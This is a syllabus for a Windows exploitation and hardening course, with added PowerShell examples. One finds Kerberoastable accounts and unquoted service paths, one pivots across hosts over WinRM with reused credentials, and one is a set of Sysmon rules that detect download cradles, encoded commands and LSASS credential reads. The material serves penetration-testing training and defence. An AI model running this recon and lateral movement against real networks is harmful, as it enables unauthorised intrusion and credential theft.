Windows Exploitation


Microsoft Windows is one of the most widely used operating systems. It runs on computers, phones, banking machines and many other devices. In this training you will learn about the Windows operating system and practise both offensive and defensive methods; knowing how to break into a system is not the same as understanding how to defend it against the attack. Students will learn current hacking methodologies and attack techniques against the various Windows operating systems and Windows applications and, on the other side, how to defend against them.

Duration: 40 Hours

Target Audience
• Penetration testers for Windows environments
• Security professionals and vendors
• System and network administrators
• IT professionals

ThinkCyber Level-2 Courses

• Getting to know Windows environment
• Discovering vulnerabilities in various Windows operating systems
• Taking advantage of vulnerabilities
• Explore multiple attacks and how to defend against them
• Hardening and securing windows OS



Module 1: Windows OS Concepts

In this module, students will learn about Windows operating systems in general, system management, folder structure, and the concept of exploitation.

  • Windows Fundamental Components
    • Common Windows Versions
    • Domain vs. Workgroup Environment
    • System Built-in Services
    • Network Configurations
      • Internet Connection State (Public or Private)
    • Security Components
      • The Windows Firewall
      • Windows Defender
      • Antimalware Scan Interface (AMSI)
      • Local Security Policy
    • CMD and Batch Scripting
    • Windows Server Concepts

Module 2: Windows Environment Exploitation

Windows systems are frequently breached. A lack of security awareness among average users, together with the flaws found from time to time in the operating system and in the many kinds of software installed on it, makes Windows a lucrative target: attackers take advantage of these weaknesses to manipulate users and carry out their malicious actions. In this module, we will exploit Windows through various methods.

  • Gathering Information
    • Enumerating Windows Services
      • SMB
      • LDAP
      • Kerberos
      • IIS
      • NetBIOS
      • RPC
    • Domain Enumeration
  • Attacking the Host
    • Basic Metasploit Modules
    • Performing Known Exploits
      • BlueKeep
      • EternalBlue
    • Cross-Forest Attacks Using Domain Trusts
    • Macro and Hardware-Based Attacks
    • Post-Exploitation Phase
      • Domain Privilege Escalation using DnsAdmins
      • Kerberos Ticket Harvesting and Kerberoasting
      • Dumping Passwords from Memory
      • Lateral Movement Throughout the Domain
      • Domain Persistence using DCShadow
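As an added illustration of the "Enumerating Windows Services" and "Kerberoasting" items above (editor-supplied example code, not part of the course material), the following PowerShell performs the two recon steps an attacker runs first on a freshly compromised domain-joined host. It uses only built-in cmdlets and the ADSI searcher, so it needs neither RSAT nor elevation; the output fields and thresholds are the editor's choices, not the course's.

```powershell
# Added example (not course material): two of the recon steps listed above, done
# with built-in PowerShell only, so it runs on a domain-joined host without RSAT.
# Run as an ordinary domain user; no elevation is required for either check.

# 1. Local service enumeration. Two things an attacker looks for: services that
#    run under a real (domain or local) account whose credentials can be
#    harvested, and unquoted service paths containing spaces (classic local
#    privilege escalation when a higher-level directory is writable).
function Get-InterestingService {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        # Unquoted path with a space somewhere before the .exe
        $unquoted = [bool]($path -and $path -notmatch '^"' -and ($path -split '\.exe')[0] -match ' ')
        [pscustomobject]@{
            Name         = $_.Name
            State        = $_.State
            StartName    = $_.StartName
            UnquotedPath = $unquoted
            Path         = $path
        }
    } | Where-Object {
        $_.UnquotedPath -or
        ($_.StartName -and $_.StartName -notmatch '^(LocalSystem|NT AUTHORITY\\|NT SERVICE\\)')
    }
}

# 2. Domain SPN enumeration. Any authenticated user can request a service ticket
#    for an account that has a servicePrincipalName; the ticket is encrypted with
#    that account's password hash, which is what Kerberoasting cracks offline.
#    Old passwords and RC4 (etype 23) make a candidate much weaker.
function Get-KerberoastCandidate {
    $filter = '(&(objectCategory=user)(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))'
    $searcher = [adsisearcher]$filter        # binds to the current domain via the logon token
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange(
        [string[]]@('sAMAccountName', 'servicePrincipalName', 'pwdLastSet',
                    'userAccountControl', 'msDS-SupportedEncryptionTypes'))
    foreach ($r in $searcher.FindAll()) {
        $p   = $r.Properties
        $uac = [int]$p['useraccountcontrol'][0]
        # Absent attribute means the DC default applies, which permits RC4 for user accounts
        $enc = if ($p.Contains('msds-supportedencryptiontypes')) { [int]$p['msds-supportedencryptiontypes'][0] } else { 0 }
        [pscustomobject]@{
            Account    = [string]$p['samaccountname'][0]
            SPNs       = @($p['serviceprincipalname'])
            PwdLastSet = [datetime]::FromFileTime([int64]$p['pwdlastset'][0])
            Disabled   = [bool]($uac -band 0x2)                 # ACCOUNTDISABLE
            RC4Allowed = ($enc -eq 0) -or [bool]($enc -band 0x4) # RC4_HMAC bit
        }
    }
}

# Usage: prioritise enabled accounts that still allow RC4 and have a password
# older than a year (one-year cut-off is an arbitrary example threshold).
Get-InterestingService | Format-Table Name, StartName, UnquotedPath, Path -AutoSize
Get-KerberoastCandidate |
    Where-Object { -not $_.Disabled -and $_.RC4Allowed -and $_.PwdLastSet -lt (Get-Date).AddYears(-1) } |
    Sort-Object PwdLastSet | Format-Table Account, PwdLastSet, SPNs -AutoSize
```

The same query is useful on the defensive side of the course: every account it returns should either be a group managed service account or carry a long random password, and a burst of service-ticket requests (Security Event ID 4769) with encryption type 0x17 from a single workstation is the signature of the harvesting step.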

Module 3: Offensive PowerShell

PowerShell is a built-in shell available on every supported version of Microsoft Windows, and it provides great flexibility and functionality for managing Windows systems. In this module we will learn techniques for using PowerShell as a red-team tool in a Windows environment, and how to understand and leverage the PowerShell platform to gain and maintain access in that environment.

  • Introduction to PowerShell Scripting
    • What is PowerShell
    • Using the ISE, the help system, cmdlets, and PowerShell syntax
    • Scripting Basics
    • Advanced Scripting
      • Working with the Pipeline, Files, Functions, Objects, Jobs, and Modules
      • Improving Performance
      • Execution Policies and Running Scripts
      • Command Injection
  • PowerShell as an Offensive Tool
    • Recon and Scanning
      • Gathering Information about the Network
      • Vulnerability Scanning and Analysis
      • Strategies
      • Avoiding Detection
      • Tools Written in or Integrated with PowerShell
    • Exploitation
      • Brute Forcing
      • Client-Side Attacks
      • Using Existing Exploitation Techniques
      • Porting Exploits to PowerShell – When and How
      • Human Interface Device (HID)
      • Getting a Foothold on the System
    • Using Management Tools to Attack Systems
    • Writing Shells in PowerShell
    • Pivoting to Other Machines using PowerShell
      • Gaining Control of WinRM and WS-Man Sessions
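As an added example for the "Using Management Tools to Attack Systems", "Pivoting" and "WinRM and WS-Man Sessions" items above (editor-supplied, not course code), this PowerShell drives a pivot entirely over PowerShell remoting. JUMP01, DB01, CORP\svc_ops and enum.ps1 are assumed names for a first-hop host, a second-tier host, a previously compromised account and a staged tool; WinRM must be enabled on both hosts.

```powershell
# Added example (not course material): pivoting and session control through
# WinRM / PowerShell remoting. JUMP01, DB01 and CORP\svc_ops are assumed names;
# WinRM (TCP 5985/5986) is assumed enabled on both hosts.

$cred = Get-Credential 'CORP\svc_ops'   # credentials recovered earlier (assumption)

# Cheap liveness check before building a session: fails fast if WinRM is off or filtered.
Test-WSMan -ComputerName JUMP01 -ErrorAction Stop | Out-Null

# A persistent session keeps state (variables, loaded modules) between calls,
# unlike one-shot Invoke-Command -ComputerName.
$jump = New-PSSession -ComputerName JUMP01 -Credential $cred

# Recon on the pivot: our rights there, and what the host already talks to.
Invoke-Command -Session $jump -ScriptBlock {
    whoami /groups | Select-String 'Administrators|Remote Management Users'
    Get-NetTCPConnection -State Established |
        Select-Object RemoteAddress, RemotePort -Unique
}

# Stage a tool over the remoting channel instead of SMB (PowerShell 5.0+).
Copy-Item -Path .\enum.ps1 -Destination 'C:\Windows\Temp\enum.ps1' -ToSession $jump

# Double hop: inside JUMP01 the Kerberos ticket cannot be re-used to reach DB01,
# so pass the credential object in explicitly. PSCredential survives remoting
# serialisation, and no CredSSP is needed for this pattern.
Invoke-Command -Session $jump -ArgumentList $cred -ScriptBlock {
    param($innerCred)
    Invoke-Command -ComputerName DB01 -Credential $innerCred -ScriptBlock {
        hostname
        whoami
        Get-Service | Where-Object Status -eq Running | Select-Object -First 5 Name
    }
}

# Session takeover: disconnected sessions this account left on the host can be
# re-attached and inherit their state. Get-PSSession -ComputerName lists only
# sessions owned by the connecting account; other accounts' disconnected
# sessions cannot be taken over this way.
Get-PSSession -ComputerName JUMP01 -Credential $cred |
    Where-Object State -eq 'Disconnected' |
    Connect-PSSession

Remove-PSSession $jump
```

Every step here is a normal administrative action, which is the point of the "management tools as attack tools" item: nothing in this script is malware, so defenders have to rely on context (which account, from which host, at what hour) and on WinRM logging (Microsoft-Windows-WinRM/Operational and PowerShell Event ID 4104 script block logs) rather than on signatures.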

Module 4: Defense and System Hardening

Microsoft Windows has long been a primary target for attacks; it therefore ships with security measures, such as Windows Update, encryption services and secure connections, that help prevent them. In this module you will learn how to detect and defend against attacks and breaches, and how to prevent them from the start using built-in Windows features and applications.

  • Windows Server Hardening
    • Proper Active Directory Structure
    • Crafting GPOs
      • Blocking Application Installation
      • Restricting Access to Command Lines
      • Registry and Run Access Control
      • Hard-Drive and USB Blocks
    • Patches and WSUS
    • Shared Folders as Drives
  • Host Hardening
    • DEP (Data Execution Prevention) – Identifying and Handling Suspicious Files
    • Restricting the User's Environment
      • Blocking the User Desktop
      • Storing User Profiles Online
      • Locking Local Users
    • Hardening Network Settings
    • BitLocker and Tamper Resistance
    • Custom Access Control
    • Sysinternals Suite
    • Understanding Event Viewer
    • Sysmon as a Service
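As an added example for the "Understanding Event Viewer" and "Sysmon as a Service" items above (editor-supplied, not course material), the following PowerShell turns the Sysmon log into detections for the tradecraft covered in Modules 2 and 3 (encoded or download-cradle PowerShell, and reading LSASS memory for credentials) and finishes with a quick check of the hardening controls this module lists. It assumes Sysmon is installed with a configuration that records Event ID 1 (process creation) and Event ID 10 (process access); the allow-list of LSASS readers and the 24-hour window are the editor's example values.

```powershell
# Added example (not course material): Sysmon-based detections for the attacks
# in the offensive modules, plus a hardening posture check. Assumes Sysmon is
# installed with process-creation (ID 1) and process-access (ID 10) logging;
# run from an elevated prompt so the log and Defender/BitLocker state are readable.

$SysmonLog = 'Microsoft-Windows-Sysmon/Operational'

# Sysmon stores its fields as <Data Name="...">value</Data>; flatten them to an object.
function ConvertFrom-SysmonEvent {
    param([Parameter(ValueFromPipeline = $true)]$Event)
    process {
        $xml = [xml]$Event.ToXml()
        $d = [ordered]@{ Time = $Event.TimeCreated; Id = $Event.Id }
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]$d
    }
}

function Get-SysmonEvent {
    param([int]$Id, [datetime]$Since)
    Get-WinEvent -FilterHashtable @{ LogName = $SysmonLog; Id = $Id; StartTime = $Since } -ErrorAction SilentlyContinue |
        ConvertFrom-SysmonEvent
}

# Detection 1 - Event ID 1: PowerShell started with an encoded command, a
# download cradle, a hidden window or an execution-policy bypass.
function Find-SuspiciousPowerShell {
    param([datetime]$Since = (Get-Date).AddHours(-24))
    # "-e <base64>" covers every accepted prefix of -EncodedCommand (-e, -ec, -enc, ...)
    $pattern = '-e[a-z]*\s+[A-Za-z0-9+/=]{40,}|FromBase64String|DownloadString|DownloadFile|IEX|Invoke-Expression|-nop|-w(indowstyle)?\s+hidden|bypass'
    Get-SysmonEvent -Id 1 -Since $Since |
        Where-Object { $_.Image -match '\\(powershell|pwsh)\.exe$' -and $_.CommandLine -match $pattern } |
        Select-Object Time, User, ParentImage, CommandLine
}

# Detection 2 - Event ID 10: a process opened lsass.exe with PROCESS_VM_READ
# (0x10), the right needed to dump credentials from memory. Processes in the
# allow-list are example known-good readers; tune it to the environment.
function Find-LsassAccess {
    param([datetime]$Since = (Get-Date).AddHours(-24))
    $allow = '\\(MsMpEng|csrss|wininit|services|svchost|lsass|taskmgr)\.exe$'
    Get-SysmonEvent -Id 10 -Since $Since |
        Where-Object {
            $_.TargetImage -match '\\lsass\.exe$' -and
            (([int]$_.GrantedAccess -band 0x10) -ne 0) -and    # GrantedAccess is a hex string, e.g. 0x1010
            $_.SourceImage -notmatch $allow
        } | Select-Object Time, SourceImage, GrantedAccess, CallTrace
}

# Posture check for the controls listed in this module. Each value that reads
# False or non-empty is a gap to close via GPO. Get-MpComputerStatus and
# Get-BitLockerVolume need the Defender and BitLocker modules (present on
# supported client/server SKUs).
function Get-HardeningPosture {
    $sbl = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        FirewallProfilesDisabled = @(Get-NetFirewallProfile | Where-Object { -not $_.Enabled }).Name
        DefenderRealtime         = [bool](Get-MpComputerStatus -ErrorAction SilentlyContinue).RealTimeProtectionEnabled
        ScriptBlockLogging       = ($sbl.EnableScriptBlockLogging -eq 1)
        SysmonRunning            = [bool](Get-Service Sysmon* -ErrorAction SilentlyContinue | Where-Object Status -eq Running)
        BitLockerOnSystemDrive   = ((Get-BitLockerVolume -MountPoint $env:SystemDrive -ErrorAction SilentlyContinue).ProtectionStatus -eq 'On')
    }
}

# Usage
Find-SuspiciousPowerShell | Format-Table -AutoSize -Wrap
Find-LsassAccess          | Format-Table -AutoSize -Wrap
Get-HardeningPosture
```

The two detections are deliberately matched to the offensive modules: the PowerShell rule fires on the "Avoiding Detection" and "Writing Shells" techniques of Module 3, and the LSASS rule on the "Dumping Passwords from Memory" step of Module 2. Running Sysmon as a service (with a tamper-resistant configuration) is what makes both possible, since the default Security log records neither command lines by default nor cross-process memory reads.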